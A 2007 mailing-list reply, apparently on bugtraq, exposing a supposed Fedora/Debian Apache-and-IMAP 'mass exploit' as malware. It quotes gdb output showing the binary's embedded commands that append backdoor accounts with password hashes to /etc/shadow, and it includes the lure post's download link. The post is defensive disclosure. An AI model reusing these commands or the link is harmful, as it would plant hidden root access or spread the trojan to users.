heh, dude seriously, at least learn to strip -s your bin's. FYI this is malware, it does things like: (gdb) x/s 0x80494e0 0x80494e0 <__dso_handle+816>: "echo toor:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow" (gdb) x/s 0x8049534 0x8049534 <__dso_handle+900>: "echo newbie:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow" Interestingly enough, the only newb here is you. On Tue, 28 Aug 2007, linux0day@xxxxxxxxxxx wrote: > Date: 28 Aug 2007 01:33:20 -0000 > From: linux0day@xxxxxxxxxxx > To: bugtraq@xxxxxxxxxxxxxxxxx > Subject: Found nice mass exploits for fedora and imap > > Hello bugtraq, > Did somebody realize a new mass exploits is realeased to public, it's seems work for fedora core 5, 6 and debian 3.1 with exploiting apache and imap. > > I've found this link somedays ago in a security forum, check this out > > http://rufy.com/images/mass/ >
